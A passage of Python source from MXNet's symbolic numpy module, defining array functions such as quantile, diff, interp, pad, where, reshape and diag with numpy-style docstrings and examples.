With this option, the result will broadcast correctly against the original `arr`. Returns ------- median : _Symbol A new array holding the result. If the input contains integers or floats smaller than ``float32``, then the output data-type is ``np.float32``. Otherwise, the data-type of the output is the same as that of the input. If `out` is specified, that array is returned instead. See Also -------- mean, percentile """ return quantile(a=a, q=0.5, axis=axis, out=out, overwrite_input=overwrite_input, interpolation='midpoint', keepdims=keepdims) @set_module('mxnet.symbol.numpy') def quantile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False): # pylint: disable=too-many-arguments """ Compute the q-th quantile of the data along the specified axis. New in version 1.15.0. Parameters ---------- a : _Symbol Input array or object that can be converted to an array. q : _Symbol Quantile or sequence of quantiles to compute, which must be between 0 and 1 inclusive. axis : {int, tuple of int, None}, optional Axis or axes along which the quantiles are computed. The default is to compute the quantile(s) along a flattened version of the array. out : ndarray, optional Alternative output array in which to place the result. It must have the same shape and buffer length as the expected output, but the type (of the output) will be cast if necessary. interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'} This optional parameter specifies the interpolation method to use when the desired quantile lies between two data points i < j: linear: i + (j - i) * fraction, where fraction is the fractional part of the index surrounded by i and j. lower: i. higher: j. nearest: i or j, whichever is nearest. midpoint: (i + j) / 2. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original array a. 
Returns ------- quantile : _Symbol If q is a single quantile and axis=None, then the result is a scalar. If multiple quantiles are given, first axis of the result corresponds to the quantiles. The other axes are the axes that remain after the reduction of a. If out is specified, that array is returned instead. See also -------- mean Notes ----- Given a vector V of length N, the q-th quantile of V is the value q of the way from the minimum to the maximum in a sorted copy of V. The values and distances of the two nearest neighbors as well as the interpolation parameter will determine the quantile if the normalized ranking does not match the location of q exactly. This function is the same as the median if q=0.5, the same as the minimum if q=0.0 and the same as the maximum if q=1.0. This function differs from the original `numpy.quantile <https://numpy.org/devdocs/reference/generated/numpy.quantile.html>`_ in the following aspects: - q must be _Symbol type even if it is a scalar - do not support overwrite_input """ if overwrite_input is not None: raise NotImplementedError('overwrite_input is not supported yet') if isinstance(q, numeric_types): return _npi.percentile(a, axis=axis, interpolation=interpolation, keepdims=keepdims, q_scalar=q * 100, out=out) return _npi.percentile(a, q * 100, axis=axis, interpolation=interpolation, keepdims=keepdims, q_scalar=None, out=out) @set_module('mxnet.symbol.numpy') def shares_memory(a, b, max_work=None): """ Determine if two arrays share memory Parameters ---------- a, b : _Symbol Input arrays Returns ------- out : _Symbol """ return _npi.share_memory(a, b) @set_module('mxnet.symbol.numpy') def may_share_memory(a, b, max_work=None): """ Determine if two arrays might share memory A return of True does not necessarily mean that the two arrays share any element. It just means that they *might*. Only the memory bounds of a and b are checked by default. 
Parameters ---------- a, b : _Symbol Input arrays Returns ------- out : _Symbol """ return _npi.share_memory(a, b) @set_module('mxnet.symbol.numpy') def diff(a, n=1, axis=-1, prepend=None, append=None): # pylint: disable=redefined-outer-name r""" Calculate the n-th discrete difference along the given axis. Parameters ---------- a : _Symbol Input array n : int, optional The number of times values are differenced. If zero, the input is returned as-is. axis : int, optional The axis along which the difference is taken, default is the last axis. prepend, append : _Symbol, optional Not supported yet Returns ------- diff : _Symbol The n-th differences. The shape of the output is the same as a except along axis where the dimension is smaller by n. The type of the output is the same as the type of the difference between any two elements of a. This is the same as the type of a in most cases. Examples -------- >>> x = np.array([1, 2, 4, 7, 0]) >>> np.diff(x) array([ 1, 2, 3, -7]) >>> np.diff(x, n=2) array([ 1, 1, -10]) >>> x = np.array([[1, 3, 6, 10], [0, 5, 6, 8]]) >>> np.diff(x) array([[2, 3, 4], [5, 1, 2]]) >>> np.diff(x, axis=0) array([[-1, 2, 0, -2]]) Notes ----- Optional inputs `prepend` and `append` are not supported yet """ if (prepend or append): raise NotImplementedError('prepend and append options are not supported yet') return _npi.diff(a, n=n, axis=axis) @set_module('mxnet.symbol.numpy') def ediff1d(ary, to_end=None, to_begin=None): """ The differences between consecutive elements of an array. Parameters ---------- ary : _Symbol If necessary, will be flattened before the differences are taken. to_end : _Symbol or scalar, optional Number(s) to append at the end of the returned differences. to_begin : _Symbol or scalar, optional Number(s) to prepend at the beginning of the returned differences. Returns ------- ediff1d : _Symbol The differences. Loosely, this is ``ary.flat[1:] - ary.flat[:-1]``. 
""" input_type = (isinstance(to_begin, _Symbol), isinstance(to_end, _Symbol)) # case 1: when both `to_begin` and `to_end` are arrays if input_type == (True, True): return _npi.ediff1d(ary, to_begin, to_end, to_begin_arr_given=True, to_end_arr_given=True, to_begin_scalar=None, to_end_scalar=None) # case 2: only `to_end` is array but `to_begin` is scalar/None elif input_type == (False, True): return _npi.ediff1d(ary, to_end, to_begin_arr_given=False, to_end_arr_given=True, to_begin_scalar=to_begin, to_end_scalar=None) # case 3: only `to_begin` is array but `to_end` is scalar/None elif input_type == (True, False): return _npi.ediff1d(ary, to_begin, to_begin_arr_given=True, to_end_arr_given=False, to_begin_scalar=None, to_end_scalar=to_end) # case 4: both `to_begin` and `to_end` are scalar/None else: return _npi.ediff1d(ary, to_begin_arr_given=False, to_end_arr_given=False, to_begin_scalar=to_begin, to_end_scalar=to_end) @set_module('mxnet.symbol.numpy') def interp(x, xp, fp, left=None, right=None, period=None): # pylint: disable=too-many-arguments """ One-dimensional linear interpolation. Returns the one-dimensional piecewise linear interpolant to a function with given values at discrete data-points. Parameters ---------- x : _Symbol The x-coordinates of the interpolated values. xp : _Symbol The x-coordinates of the data points, must be increasing if argument `period` is not specified. Otherwise, `xp` is internally sorted after normalizing the periodic boundaries with ``xp = xp % period``. fp : _Symbol The y-coordinates of the data points, same length as `xp`. left : optional float corresponding to fp Value to return for `x < xp[0]`, default is `fp[0]`. right : optional float corresponding to fp Value to return for `x > xp[-1]`, default is `fp[-1]`. period : None or float, optional A period for the x-coordinates. This parameter allows the proper interpolation of angular x-coordinates. Parameters `left` and `right` are ignored if `period` is specified. .. 
versionadded:: 1.10.0 Returns ------- y : _Symbol The interpolated values, same shape as `x`. Raises ------ ValueError If `xp` and `fp` have different length If `xp` or `fp` are not 1-D sequences If `period == 0` Notes ----- Does not check that the x-coordinate sequence `xp` is increasing. If `xp` is not increasing, the results are nonsense. A simple check for increasing is:: np.all(np.diff(xp) > 0) """ if isinstance(x, numeric_types): return _npi.interp(xp.astype(float), fp.astype(float), left=left, right=right, period=period, x_scalar=x, x_is_scalar=True) return _npi.interp(xp.astype(float), fp.astype(float), x.astype(float), left=left, right=right, period=period, x_scalar=0.0, x_is_scalar=False) @set_module('mxnet.symbol.numpy') def resize(a, new_shape): """ Return a new array with the specified shape. If the new array is larger than the original array, then the new array is filled with repeated copies of `a`. Note that this behavior is different from a.resize(new_shape) which fills with zeros instead of repeated copies of `a`. Parameters ---------- a : _Symbol Array to be resized. new_shape : int or tuple of int Shape of resized array. Returns ------- reshaped_array : _Symbol The new array is formed from the data in the old array, repeated if necessary to fill out the required number of elements. The data are repeated in the order that they are stored in memory. See Also -------- ndarray.resize : resize an array in-place. Notes ----- Warning: This functionality does **not** consider axes separately, i.e. it does not apply interpolation/extrapolation. It fills the return array with the required number of elements, taken from `a` as they are laid out in memory, disregarding strides and axes. (This is in case the new shape is smaller. For larger, see above.) This functionality is therefore not suitable to resize images, or data where each axis represents a separate and distinct entity. 
Examples -------- >>> a = np.array([[0, 1], [2, 3]]) >>> np.resize(a, (2, 3)) array([[0., 1., 2.], [3., 0., 1.]]) >>> np.resize(a, (1, 4)) array([[0., 1., 2., 3.]]) >>> np.resize(a,(2, 4)) array([[0., 1., 2., 3.], [0., 1., 2., 3.]]) """ return _npi.resize_fallback(a, new_shape=new_shape) # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def nan_to_num(x, copy=True, nan=0.0, posinf=None, neginf=None, **kwargs): """ Replace NaN with zero and infinity with large finite numbers (default behaviour) or with the numbers defined by the user using the `nan`, `posinf` and/or `neginf` keywords. If `x` is inexact, NaN is replaced by zero or by the user defined value in `nan` keyword, infinity is replaced by the largest finite floating point values representable by ``x.dtype`` or by the user defined value in `posinf` keyword and -infinity is replaced by the most negative finite floating point values representable by ``x.dtype`` or by the user defined value in `neginf` keyword. For complex dtypes, the above is applied to each of the real and imaginary components of `x` separately. If `x` is not inexact, then no replacements are made. Parameters ---------- x : _Symbol Input data. copy : bool, optional Whether to create a copy of `x` (True) or to replace values in-place (False). The in-place operation only occurs if casting to an array does not require a copy. Default is True. nan : int, float, optional Value to be used to fill NaN values. If no value is passed then NaN values will be replaced with 0.0. posinf : int, float, optional Value to be used to fill positive infinity values. If no value is passed then positive infinity values will be replaced with a very large number. neginf : int, float, optional Value to be used to fill negative infinity values. If no value is passed then negative infinity values will be replaced with a very small (or negative) number. .. versionadded:: 1.13 Returns ------- out : _Symbol `x`, with the non-finite values replaced. 
If `copy` is False, this may be `x` itself. Notes ----- NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). This means that Not a Number is not equivalent to infinity. """ if isinstance(x, numeric_types): return _np.nan_to_num(x, copy, nan, posinf, neginf) elif isinstance(x, _Symbol): if not copy: return _npi.nan_to_num(x, copy=copy, nan=nan, posinf=posinf, neginf=neginf, out=x) return _npi.nan_to_num(x, copy=copy, nan=nan, posinf=posinf, neginf=neginf, out=None) else: raise TypeError('type {} not supported'.format(str(type(x)))) @set_module('mxnet.symbol.numpy') def squeeze(x, axis=None): """ Remove single-dimensional entries from the shape of an array. Parameters ---------- a : array_like Input data. axis : None or int or tuple of ints, optional .. versionadded:: 1.7.0 Selects a subset of the single-dimensional entries in the shape. If an axis is selected with shape entry greater than one, an error is raised. Returns ------- squeezed : ndarray The input array, but with all or a subset of the dimensions of length 1 removed. This is always `a` itself or a view into `a`. Raises ------ ValueError If `axis` is not `None`, and an axis being squeezed is not of length 1 See Also -------- expand_dims : The inverse operation, adding singleton dimensions reshape : Insert, remove, and combine dimensions, and resize existing ones Examples -------- >>> x = np.array([[[0], [1], [2]]]) >>> x.shape (1, 3, 1) >>> np.squeeze(x).shape (3,) >>> np.squeeze(x, axis=0).shape (3, 1) >>> np.squeeze(x, axis=1).shape Traceback (most recent call last): ... ValueError: cannot select an axis to squeeze out which has size not equal to one >>> np.squeeze(x, axis=2).shape (1, 3) """ return _npi.squeeze(x, axis=axis) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def isnan(x, out=None, **kwargs): """ Test element-wise for NaN and return result as a boolean array. Parameters ---------- x : _Symbol or scalar Input array. 
out : _Symbol or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- y : _Symbol or bool True where x is NaN, false otherwise. This is a scalar if x is a scalar. Notes ----- NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). This means that Not a Number is not equivalent to infinity. This function differs from the original `numpy.isnan <https://docs.scipy.org/doc/numpy/reference/generated/numpy.isnan.html>`_ in the following aspects: - Does not support complex number for now - Input type does not support Python native iterables(list, tuple, ...). - ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _unary_func_helper(x, _npi.isnan, _np.isnan, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def isinf(x, out=None, **kwargs): """ Test element-wise for positive or negative infinity. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- y : _Symbol or bool True where x is positive or negative infinity, false otherwise. This is a scalar if x is a scalar. Notes ----- NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). 
This function differs from the original `numpy.isinf <https://docs.scipy.org/doc/numpy/reference/generated/numpy.isnan.html>`_ in the following aspects: - Does not support complex number for now - Input type does not support Python native iterables(list, tuple, ...). - ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _unary_func_helper(x, _npi.isinf, _np.isinf, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def isposinf(x, out=None, **kwargs): """ Test element-wise for positive infinity, return result as bool array. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- y : _Symbol or bool True where x is positive infinity, false otherwise. This is a scalar if x is a scalar. Notes ----- NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). This means that Not a Number is not equivalent to infinity. """ return _unary_func_helper(x, _npi.isposinf, _np.isposinf, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def isneginf(x, out=None, **kwargs): """ Test element-wise for negative infinity, return result as bool array. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- y : _Symbol or bool True where x is negative infinity, false otherwise. This is a scalar if x is a scalar. 
Notes ----- NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). This means that Not a Number is not equivalent to infinity. """ return _unary_func_helper(x, _npi.isneginf, _np.isneginf, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def isfinite(x, out=None, **kwargs): """ Test element-wise for finiteness (not infinity or not Not a Number). Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- y : _Symbol or bool True where x is negative infinity, false otherwise. This is a scalar if x is a scalar. Notes ----- Not a Number, positive infinity and negative infinity are considered to be non-finite. NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). This means that Not a Number is not equivalent to infinity. Also that positive infinity is not equivalent to negative infinity. But infinity is equivalent to positive infinity. Errors result if the second argument is also supplied when x is a scalar input, or if first and second arguments have different shapes. """ return _unary_func_helper(x, _npi.isfinite, _np.isfinite, out=out, **kwargs) @set_module('mxnet.symbol.numpy') def atleast_1d(*arys): """ Convert inputs to arrays with at least one dimension. Scalar inputs are converted to 1-dimensional arrays, whilst higher-dimensional inputs are preserved. Parameters ---------- arys1, arys2, ... : _Symbol One or more input arrays. Returns ------- ret : _Symbol An array, or list of arrays, each with a.ndim >= 1. Copies are made only if necessary. See also -------- atleast_2d, atleast_3d """ return _npi.atleast_1d(*arys) @set_module('mxnet.symbol.numpy') def atleast_2d(*arys): """ Convert inputs to arrays with at least two dimensions. 
Parameters ---------- arys1, arys2, ... : _Symbol One or more input arrays. Returns ------- ret : _Symbol An array, or list of arrays, each with a.ndim >= 2. Copies are made only if necessary. See also -------- atleast_1d, atleast_3d """ return _npi.atleast_2d(*arys) @set_module('mxnet.symbol.numpy') def atleast_3d(*arys): """ Convert inputs to arrays with at least three dimension. Parameters ---------- arys1, arys2, ... : _Symbol One or more input arrays. Returns ------- ret : _Symbol An array, or list of arrays, each with a.ndim >= 3. For example, a 1-D array of shape (N,) becomes a view of shape (1, N, 1), and a 2-D array of shape (M, N) becomes a view of shape (M, N, 1). See also -------- atleast_1d, atleast_2d """ return _npi.atleast_3d(*arys) @set_module('mxnet.symbol.numpy') def where(condition, x, y): """ Return elements chosen from `x` or `y` depending on `condition`. Parameters ---------- condition : _Symbol Where True, yield `x`, otherwise yield `y`. x, y : _Symbol Values from which to choose. `x`, `y` and `condition` need to be broadcastable to some shape. `x` and `y` must have the same dtype. Returns ------- out : _Symbol An array with elements from `x` where `condition` is True, and elements from `y` elsewhere. """ if isinstance(condition, numeric_types): if condition != 0: return x else: return y else: if isinstance(x, numeric_types) and isinstance(y, numeric_types): return _npi.where_scalar2(condition, float(x), float(y), out=None) elif isinstance(x, Symbol) and isinstance(y, Symbol): return _npi.where(condition, x, y, out=None) elif isinstance(y, Symbol): return _npi.where_lscalar(condition, y, float(x), out=None) elif isinstance(x, Symbol): return _npi.where_rscalar(condition, x, float(y), out=None) else: raise TypeError('type {0} and {1} not supported'.format(str(type(x)), str(type(y)))) @set_module('mxnet.symbol.numpy') def load(fname): """Loads symbol from a JSON file. You can also use pickle to do the job if you only work on python. 
The advantage of load/save is the file is language agnostic. This means the file saved using save can be loaded by other language binding of mxnet. You also get the benefit being able to directly load/save from cloud storage(S3, HDFS). Parameters ---------- fname : str The name of the file, examples: - `s3://my-bucket/path/my-s3-symbol` - `hdfs://my-bucket/path/my-hdfs-symbol` - `/path-to/my-local-symbol` Returns ------- sym : _Symbol The loaded symbol. See Also -------- _Symbol.save : Used to save symbol into file. """ if not isinstance(fname, string_types): raise TypeError('fname needs to be string') handle = SymbolHandle() check_call(_LIB.MXSymbolCreateFromFile(c_str(fname), ctypes.byref(handle))) return _Symbol(handle) @set_module('mxnet.symbol.numpy') def load_json(json_str): """Loads symbol from json string. Parameters ---------- json_str : str A JSON string. Returns ------- sym : Symbol The loaded symbol. See Also -------- _Symbol.tojson : Used to save symbol into json string. """ if not isinstance(json_str, string_types): raise TypeError('json_str needs to be string') handle = SymbolHandle() check_call(_LIB.MXSymbolCreateFromJSON(c_str(json_str), ctypes.byref(handle))) return _Symbol(handle) @set_module('mxnet.symbol.numpy') def polyval(p, x): """ Evaluate a polynomial at specific values. If p is of length N, this function returns the value: p[0]*x**(N-1) + p[1]*x**(N-2) + ... + p[N-2]*x + p[N-1] If x is a sequence, then p(x) is returned for each element of x. If x is another polynomial then the composite polynomial p(x(t)) is returned. Parameters ---------- p : _Symbol 1D array of polynomial coefficients (including coefficients equal to zero) from highest degree to the constant term. x : _Symbol An array of numbers, at which to evaluate p. 
Returns ------- values : _Symbol Result array of polynomials Notes ----- This function differs from the original `numpy.polyval <https://numpy.org/devdocs/reference/generated/numpy.polyval.html>`_ in the following way(s): - Does not support poly1d. - X should be ndarray type even if it contains only one element. """ if isinstance(p, Symbol) and isinstance(x, Symbol): return _npi.polyval(p, x) elif not isinstance(p, Symbol) and not isinstance(x, Symbol): return _np.polyval(p, x) else: raise TypeError('type not supported') @set_module('mxnet.symbol.numpy') def bincount(x, weights=None, minlength=0): """ Count number of occurrences of each value in array of non-negative ints. Parameters ---------- x : _Symbol input data weights: _Symbol input weigths same shape as x. (Optional) minlength: int A minimum number of bins for the output. (Optional) Returns -------- out : _Symbol the result of binning the input data. The length of out is equal to amax(x)+1. Raises: -------- Value Error If the input is not 1-dimensional, or contains elements with negative values, or if minlength is negative TypeError If the type of the input is float or complex. """ if minlength < 0: raise ValueError("Minlength value should greater than 0") if weights is None: return _npi.bincount(x, minlength=minlength, has_weights=False) return _npi.bincount(x, weights=weights, minlength=minlength, has_weights=True) @set_module('mxnet.symbol.numpy') def pad(x, pad_width, mode='constant', **kwargs): # pylint: disable=too-many-arguments """ Pad an array. Parameters ---------- array : array_like of rank N The array to pad. pad_width : {sequence, array_like, int} Number of values padded to the edges of each axis. ((before_1, after_1), ... (before_N, after_N)) unique pad widths for each axis. ((before, after),) yields same before and after pad for each axis. (pad,) or int is a shortcut for before = after = pad width for all axes. 
mode : str or function, optional One of the following string values or a user supplied function. 'constant' (default) Pads with a constant value. 'edge' Pads with the edge values of array. 'linear_ramp' not supported yet 'maximum' Pads with the maximum value of all of the vector along each axis. 'mean' not supported yet 'median' not supported yet 'minimum' Pads with the minimum value of all of the vector along each axis. 'reflect' Pads with the reflection of the vector mirrored on the first and last values of the vector along each axis. 'symmetric' Pads with the reflection of the vector mirrored along the edge of the array. 'wrap' not supported yet. 'empty' not supported yet. <function> not supported yet. stat_length : not supported yet constant_values : scalar, optional Used in 'constant'. The values to set the padded values for each axis. Default is 0. end_values : not supported yet reflect_type : {'even', 'odd'}, optional only support even now Returns ------- pad : ndarray Padded array of rank equal to `array` with shape increased according to `pad_width`. 
""" # pylint: disable = too-many-return-statements, inconsistent-return-statements if not _np.asarray(pad_width).dtype.kind == 'i': raise TypeError('`pad_width` must be of integral type.') if not isinstance(pad_width, tuple): raise TypeError("`pad_width` must be tuple.") if mode == "linear_ramp": raise ValueError("mode {'linear_ramp'} is not supported.") if mode == "wrap": raise ValueError("mode {'wrap'} is not supported.") if mode == "median": raise ValueError("mode {'median'} is not supported.") if mode == "mean": raise ValueError("mode {'mean'} is not supported.") if mode == "empty": raise ValueError("mode {'empty'} is not supported.") if callable(mode): raise ValueError("mode {'<function>'} is not supported.") allowedkwargs = { 'constant': ['constant_values'], 'edge': [], 'linear_ramp': ['end_values'], 'maximum': ['stat_length'], 'mean': ['stat_length'], 'median': ['stat_length'], 'minimum': ['stat_length'], 'reflect': ['reflect_type'], 'symmetric': ['reflect_type'], 'wrap': [], } if isinstance(mode, _np.compat.basestring): # Make sure have allowed kwargs appropriate for mode for key in kwargs: if key not in allowedkwargs[mode]: raise ValueError('%s keyword not in allowed keywords %s' %(key, allowedkwargs[mode])) unsupported_kwargs = set(kwargs) - set(allowedkwargs[mode]) if unsupported_kwargs: raise ValueError("unsupported keyword arguments for mode '{}': {}" .format(mode, unsupported_kwargs)) if mode == "constant": values = kwargs.get("constant_values", 0) if isinstance(values, tuple): raise TypeError("unsupported constant_values type: {'tuple'}.") return _npi.pad(x, pad_width, mode='constant', constant_values=values) elif mode == "symmetric": values = kwargs.get("reflect_type", "even") if values != "even" and values is not None: raise ValueError("unsupported reflect_type '{}'".format(values)) return _npi.pad(x, pad_width, mode='symmetric', reflect_type="even") elif mode == "edge": return _npi.pad(x, pad_width, mode='edge') elif mode == "reflect": values = 
kwargs.get("reflect_type", "even") if values != "even" and values is not None: raise ValueError("unsupported reflect_type '{}'".format(values)) return _npi.pad(x, pad_width, mode='reflect', reflect_type="even") elif mode == "maximum": values = kwargs.get("stat_length", None) if values is not None: raise ValueError("unsupported stat_length '{}'".format(values)) return _npi.pad(x, pad_width, mode='maximum') elif mode == "minimum": values = kwargs.get("stat_length", None) if values is not None: raise ValueError("unsupported stat_length '{}'".format(values)) return _npi.pad(x, pad_width, mode='minimum') return _npi.pad(x, pad_width, mode='constant', constant_values=0) @set_module('mxnet.symbol.numpy') def prod(a, axis=None, dtype=None, keepdims=False, initial=None, output=None): # pylint: disable=too-many-arguments """ Return the product of array elements over a given axis. Parameters ---------- a : array_like Input data. axis : None or int or tuple of ints, optional Axis or axes along which a product is performed. The default, axis=None, will calculate the product of all the elements in the input array. If axis is negative it counts from the last to the first axis. .. versionadded:: 1.7.0 If axis is a tuple of ints, a product is performed on all of the axes specified in the tuple instead of a single axis or all the axes as before. dtype : dtype, optional The type of the returned array, as well as of the accumulator in which the elements are multiplied. The dtype of `a` is used by default unless `a` has an integer dtype of less precision than the default platform integer. In that case, if `a` is signed then the platform integer is used while if `a` is unsigned then an unsigned integer of the same precision as the platform integer is used. out : ndarray, optional Alternative output array in which to place the result. It must have the same shape as the expected output, but the type of the output values will be cast if necessary. 
keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the input array. If the default value is passed, then `keepdims` will not be passed through to the `prod` method of sub-classes of `ndarray`, however any non-default value will be. If the sub-class' method does not implement `keepdims` any exceptions will be raised. initial : scalar, optional The starting value for this product. See `~numpy.ufunc.reduce` for details. where : not supported Returns ------- product_along_axis : ndarray, see `dtype` parameter above. An array shaped as `a` but with the specified axis removed. Returns a reference to `out` if specified. Examples -------- By default, calculate the product of all elements: >>> np.prod([1.,2.]) 2.0 Even when the input array is two-dimensional: >>> np.prod([[1.,2.],[3.,4.]]) 24.0 But we can also specify the axis over which to multiply: >>> np.prod([[1.,2.],[3.,4.]], axis=1) array([ 2., 12.]) Or select specific elements to include: >>> np.prod([1., np.nan, 3.], where=[True, False, True]) 3.0 If the type of `x` is unsigned, then the output type is the unsigned platform integer: >>> x = np.array([1, 2, 3], dtype=np.uint8) >>> np.prod(x).dtype == np.uint True If `x` is of a signed integer type, then the output type is the default platform integer: >>> x = np.array([1, 2, 3], dtype=np.int8) >>> np.prod(x).dtype == int True You can also start the product with a value other than one: >>> np.prod([1, 2], initial=5) 10 """ return _npi.prod(a, axis=axis, dtype=dtype, keepdims=keepdims, initial=initial) @set_module('mxnet.symbol.numpy') def cumsum(a, axis=None, dtype=None, out=None): """ Return the cumulative sum of the elements along a given axis. Parameters ---------- a : _Symbol Input array. axis : int, optional Axis along which the cumulative sum is computed. The default (None) is to compute the cumsum over the flattened array. 
dtype : dtype, optional Type of the returned array and of the accumulator in which the elements are summed. If `dtype` is not specified, it defaults to the dtype of `a`, unless `a` has an integer dtype with a precision less than that of the default platform integer. In that case, the default platform integer is used. out : _Symbol, optional Alternative output array in which to place the result. It must have the same shape and buffer length as the expected output but the type will be cast if necessary. See `doc.ufuncs` (Section "Output arguments") for more details. Returns ------- cumsum_along_axis : _Symbol. A new array holding the result is returned unless `out` is specified, in which case a reference to `out` is returned. The result has the same size as `a`, and the same shape as `a` if `axis` is not None or `a` is a 1-d array. """ return _npi.cumsum(a, axis=axis, dtype=dtype, out=out) @set_module('mxnet.symbol.numpy') def reshape(a, newshape, reverse=False, order='C'): """ Gives a new shape to an array without changing its data. This function always returns a copy of the input array if ``out`` is not provided. Parameters ---------- a : _Symbol Array to be reshaped. newshape : int or tuple of ints The new shape should be compatible with the original shape. If an integer, then the result will be a 1-D array of that length. One shape dimension can be -1. In this case, the value is inferred from the length of the array and remaining dimensions. order : {'C'}, optional Read the elements of `a` using this index order, and place the elements into the reshaped array using this index order. 'C' means to read / write the elements using C-like index order, with the last axis index changing fastest, back to the first axis index changing slowest. Other order types such as 'F'/'A' may be added in the future. Returns ------- reshaped_array : _Symbol It will be always a copy of the original array. 
This behavior is different from the official NumPy ``reshape`` operator where views of the original array may be generated. See Also -------- ndarray.reshape : Equivalent method. Examples -------- >>> a = np.arange(6).reshape((3, 2)) >>> a array([[0., 1.], [2., 3.], [4., 5.]]) >>> np.reshape(a, (2, 3)) # C-like index ordering array([[0., 1., 2.], [3., 4., 5.]]) >>> np.reshape(np.ravel(a), (2, 3)) # equivalent to C ravel then C reshape array([[0., 1., 2.], [3., 4., 5.]]) >>> a = np.array([[1,2,3], [4,5,6]]) >>> np.reshape(a, 6) array([1., 2., 3., 4., 5., 6.]) >>> np.reshape(a, (3,-1)) # the unspecified value is inferred to be 2 array([[1., 2.], [3., 4.], [5., 6.]]) """ return _npi.reshape(a, newshape, reverse, order) @set_module('mxnet.symbol.numpy') def moveaxis(a, source, destination): """Move axes of an array to new positions. Other axes remain in their original order. Parameters ---------- a : _Symbol The array whose axes should be reordered. source : int or sequence of int Original positions of the axes to move. These must be unique. destination : int or sequence of int Destination positions for each of the original axes. These must also be unique. Returns ------- result : _Symbol Array with moved axes. This array is a view of the input array. See Also -------- transpose: Permute the dimensions of an array. swapaxes: Interchange two axes of an array. Examples -------- >>> x = np.zeros((3, 4, 5)) >>> np.moveaxis(x, 0, -1).shape (4, 5, 3) >>> np.moveaxis(x, -1, 0).shape (5, 3, 4) These all achieve the same result: >>> np.transpose(x).shape (5, 4, 3) >>> np.swapaxes(x, 0, -1).shape (5, 4, 3) >>> np.moveaxis(x, [0, 1], [-1, -2]).shape (5, 4, 3) >>> np.moveaxis(x, [0, 1, 2], [-1, -2, -3]).shape (5, 4, 3) """ return _npi.moveaxis(a, source, destination) @set_module('mxnet.symbol.numpy') def copy(a): # pylint: disable=redefined-outer-name """ Return an array copy of the given object. Parameters ---------- a : _Symbol Input array. 
Returns ------- arr : _Symbol Array interpretation of a. ----- Examples -------- >>> x = np.array([1, 2, 3]) >>> y = x >>> z = np.copy(x) >>> x[0] = 10 >>> x[0] == y[0] True >>> x[0] == z[0] False """ return _npi.copy(a) @set_module('mxnet.symbol.numpy') def rollaxis(a, axis, start=0): """ Roll the specified axis backwards, until it lies in a given position. Parameters ---------- a : _Symbol Input array. axis : integer The axis to roll backwards. The positions of the other axes do not change relative to one another. start: int, optional The axis is rolled until it lies before this position. The default, 0, results in a “complete” roll. Returns ------- res : _Symbol A view after applying rollaxis to `a` is returned. ----- Examples -------- >>> a = np.ones((3,4,5,6)) >>> np.rollaxis(a, 3, 1).shape (3, 6, 4, 5) >>> np.rollaxis(a, 2).shape (5, 3, 4, 6) >>> np.rollaxis(a, 1, 4).shape (3, 5, 6, 4) """ return _npi.rollaxis(a, axis, start) @set_module('mxnet.symbol.numpy') def diag(v, k=0): """ Extracts a diagonal or constructs a diagonal array. - 1-D arrays: constructs a 2-D array with the input as its diagonal, all other elements are zero. - 2-D arrays: extracts the k-th Diagonal Parameters ---------- array : _Symbol The array to apply diag method. k : offset extracts or constructs kth diagonal given input array Returns ---------- out : _Symbol The extracted diagonal or constructed diagonal array. """ return _npi.diag(v, k=k) @set_module('mxnet.symbol.numpy') def diagflat(v, k=0): """ Create a two-dimensional array with the flattened input as a diagonal. Parameters ---------- v : array_like Input data, which is flattened and set as the `k`-th diagonal of the output. k : int, optional Diagonal to set; 0, the default, corresponds to the "main" diagonal, a positive (negative) `k` giving the number of the diagonal above (below) the main. Returns ------- out : ndarray The 2-D output array. See Also -------- diag : MATLAB work-alike for 1-D and 2-D arrays. 
